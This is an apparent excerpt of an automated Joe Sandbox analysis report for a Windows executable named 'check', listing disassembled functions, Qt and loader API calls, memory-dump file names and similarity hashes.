                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Variant@@$?setFormat@@Property@String@@@TextVariant@@@
                                                                                                                                                                                                                                          • String ID: BJ1$QTextCharFormat$setFontStyleName$setFontStyleName(self, styleName: Optional[str])
                                                                                                                                                                                                                                          • API String ID: 3611022156-1849772701
                                                                                                                                                                                                                                          • Opcode ID: a741d49449aec63e92a66d676d2b31264c350f6c774362186e362bb769ee7808
                                                                                                                                                                                                                                          • Instruction ID: 6002d6b136a6e6b5f2a82b6650a782d170693a9b91610ecd7c8358985e22eb1a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a741d49449aec63e92a66d676d2b31264c350f6c774362186e362bb769ee7808
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F31E237A08B8AD1DB208F15E8891A973B4FB48BC4F914032DA9E43724EF3DE559C704
                                                                                                                                                                                                                                          Function 00007FF89D93E090 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 53threadCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Eval_Thread$?sender@Object@@RestoreSave
                                                                                                                                                                                                                                          • String ID: QTextDocument$qtcore_qobject_sender$sender$sender(self) -> Optional[QObject]
                                                                                                                                                                                                                                          • API String ID: 10903585-1049448907
                                                                                                                                                                                                                                          • Opcode ID: fa7c5dd0ecf7c5a5c2f78998e725c0a3f339fc6dbd449ca055905f4b651a8f15
                                                                                                                                                                                                                                          • Instruction ID: 410a34a50e284b022d80fda1e329885f69474a0acce80429ea29db6e28c7b627
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa7c5dd0ecf7c5a5c2f78998e725c0a3f339fc6dbd449ca055905f4b651a8f15
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E210A37A09B4681EB609F51E8496A963A4FB48FD0F948032DA8E43724FF3CF159C704
                                                                                                                                                                                                                                          Function 00007FF89D94DDD0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: List_$FromItemLongLong_$?point@Polygon@@
                                                                                                                                                                                                                                          • String ID: (N)
                                                                                                                                                                                                                                          • API String ID: 3087083472-3847697581
                                                                                                                                                                                                                                          • Opcode ID: 3cd72ab1dc4af6f92d4a2d0cedb26713351c2479714c49bc34b1c7264cc128e1
                                                                                                                                                                                                                                          • Instruction ID: 57414822897500e23d29cf8fee73c58d7ce232b123f8736a064100493f85e051
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3cd72ab1dc4af6f92d4a2d0cedb26713351c2479714c49bc34b1c7264cc128e1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B119177609A41CAD7208F55F88516AA7A1FB88FC1B498031EF8F43729EE3CE455C744
                                                                                                                                                                                                                                          Function 00007FF89D9C5FB0 Relevance: 12.1, APIs: 8, Instructions: 134memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??0QFont@@QEAA@AEBV0@@Z.QT5GUI(?,?,?,?,00000000,00000000,00000000,00007FF89D98A2F6), ref: 00007FF89D9C5FEA
                                                                                                                                                                                                                                          • ??0QFont@@QEAA@AEBV0@@Z.QT5GUI(?,?,?,?,00000000,00000000,00000000,00007FF89D98A2F6), ref: 00007FF89D9C6017
                                                                                                                                                                                                                                          • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,?,00000000,00000000,00000000,00007FF89D98A2F6), ref: 00007FF89D9C6055
                                                                                                                                                                                                                                          • ??0QFont@@QEAA@AEBV0@@Z.QT5GUI(?,?,?,?,00000000,00000000,00000000,00007FF89D98A2F6), ref: 00007FF89D9C60AA
                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,00000000,00000000,00000000,00007FF89D98A2F6), ref: 00007FF89D9C60CB
                                                                                                                                                                                                                                          • ?deallocate@QArrayData@@SAXPEAU1@_K1@Z.QT5CORE(?,?,?,?,00000000,00000000,00000000,00007FF89D98A2F6), ref: 00007FF89D9C611F
                                                                                                                                                                                                                                          • ??0QFont@@QEAA@AEBV0@@Z.QT5GUI(?,?,?,?,00000000,00000000,00000000,00007FF89D98A2F6), ref: 00007FF89D9C6149
                                                                                                                                                                                                                                          • ??1QTextFormat@@QEAA@XZ.QT5GUI(?,?,?,?,00000000,00000000,00000000,00007FF89D98A2F6), ref: 00007FF89D9C6154
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Font@@V0@@$Array$Data@@U1@_$?allocate@?deallocate@AllocationData@@@@@Flags@Format@@Option@Textmemcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 203156587-0
                                                                                                                                                                                                                                          • Opcode ID: 5cca0e70afa3c57de14d3176ae8a5be28cef10339677c22d696923d34b07661c
                                                                                                                                                                                                                                          • Instruction ID: d48409011ee8f1451e297c2ac9d1c5bc0460942d795863c921e1494b4cb69659
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cca0e70afa3c57de14d3176ae8a5be28cef10339677c22d696923d34b07661c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15518C73A04A4187EB60AF29E88426DB7A1FB94FD5F158132DB9F477A1DE38E442C704
                                                                                                                                                                                                                                          Function 00007FF89ECA17A0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 122COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2747791894.00007FF89ECA1000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FF89ECA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747637090.00007FF89ECA0000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ECA6000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ECEA000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ECF8000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ED47000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2748309003.00007FF89ED4A000.00000004.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2748347304.00007FF89ED4C000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89eca0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Arg_ArgumentFromStringSubtypeType_Unicode_
                                                                                                                                                                                                                                          • String ID: a unicode character$argument$category
                                                                                                                                                                                                                                          • API String ID: 1318908108-2068800536
                                                                                                                                                                                                                                          • Opcode ID: 819d02cb5a53b99fb765d21f9d19cde95ec2cc2e6cea83f9e4c806781089034f
                                                                                                                                                                                                                                          • Instruction ID: 869713a8d70873136da7f352704434ecacc473fadf9ff94145690d7245f46252
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 819d02cb5a53b99fb765d21f9d19cde95ec2cc2e6cea83f9e4c806781089034f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F45186A2F2865282EB748B19D4A027C2BA1EB44FD8F455035EACE47794DF2DF895C320
                                                                                                                                                                                                                                          Function 00007FF89D937AC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 107COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Point$F@@@@Vector@$?append@?$F@@@Polygon
                                                                                                                                                                                                                                          • String ID: QPolygonF$__getitem__
                                                                                                                                                                                                                                          • API String ID: 3069565249-1125083749
                                                                                                                                                                                                                                          • Opcode ID: da13391782f449ba148e81d7404c23b71cafb5acdeea17eb7d355e3f5dd026e4
                                                                                                                                                                                                                                          • Instruction ID: c6de0f00963757b455719eb024874e67eb02caa0c710051acf7f420b5cd306c4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da13391782f449ba148e81d7404c23b71cafb5acdeea17eb7d355e3f5dd026e4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68511137A08B4692EB509F15E48526A77A1FB88FD4F448032EA8E47728EF3CF055CB04
                                                                                                                                                                                                                                          Function 00007FF89D993AE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??_0Vector3$SubtypeType_V0@@
                                                                                                                                                                                                                                          • String ID: 1J9
                                                                                                                                                                                                                                          • API String ID: 2671363276-2407233842
                                                                                                                                                                                                                                          • Opcode ID: d63ec71e5b9591f32adac0eef95a3954b7f486ea87113df824d8fb0f32220d3b
                                                                                                                                                                                                                                          • Instruction ID: 347b3d795508fc8b704d55764c1fbcb035cba03fa637e6d40a15c795a94b5669
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d63ec71e5b9591f32adac0eef95a3954b7f486ea87113df824d8fb0f32220d3b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD41DD67A08A46C1EB609F56F845179A3B0FB88FD4F484432EE8E43B68EF7CE4559704
                                                                                                                                                                                                                                          Function 00007FF89ECA1000 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 93COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2747791894.00007FF89ECA1000.00000020.00000001.01000000.00000020.sdmp, Offset: 00007FF89ECA0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747637090.00007FF89ECA0000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ECA6000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ECEA000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ECF8000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2747911281.00007FF89ED47000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2748309003.00007FF89ED4A000.00000004.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2748347304.00007FF89ED4C000.00000002.00000001.01000000.00000020.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89eca0000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Arg_ArgumentFromStringSubtypeType_Unicode_
                                                                                                                                                                                                                                          • String ID: a unicode character$argument$bidirectional
                                                                                                                                                                                                                                          • API String ID: 1318908108-2110215792
                                                                                                                                                                                                                                          • Opcode ID: 20e64b3dea6743d8d76ee490ceeb3f1ff441adf4638d8619ffabdd99ac876f95
                                                                                                                                                                                                                                          • Instruction ID: 6cbcddc8837f2dfb06e60528f48a2adc726dba338e0ee170678537dc560a53ed
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20e64b3dea6743d8d76ee490ceeb3f1ff441adf4638d8619ffabdd99ac876f95
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F3180A6A2C68282FB788B1584913BD3B61EB80FD8F545035DADF47691CE2DF954C360
                                                                                                                                                                                                                                          Function 00007FF7124FDCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF7124FDF7A,?,?,?,00007FF7124FDC6C,?,?,?,00007FF7124FD869), ref: 00007FF7124FDD4D
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF7124FDF7A,?,?,?,00007FF7124FDC6C,?,?,?,00007FF7124FD869), ref: 00007FF7124FDD5B
                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF7124FDF7A,?,?,?,00007FF7124FDC6C,?,?,?,00007FF7124FD869), ref: 00007FF7124FDD85
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF7124FDF7A,?,?,?,00007FF7124FDC6C,?,?,?,00007FF7124FD869), ref: 00007FF7124FDDF3
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF7124FDF7A,?,?,?,00007FF7124FDC6C,?,?,?,00007FF7124FD869), ref: 00007FF7124FDDFF
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
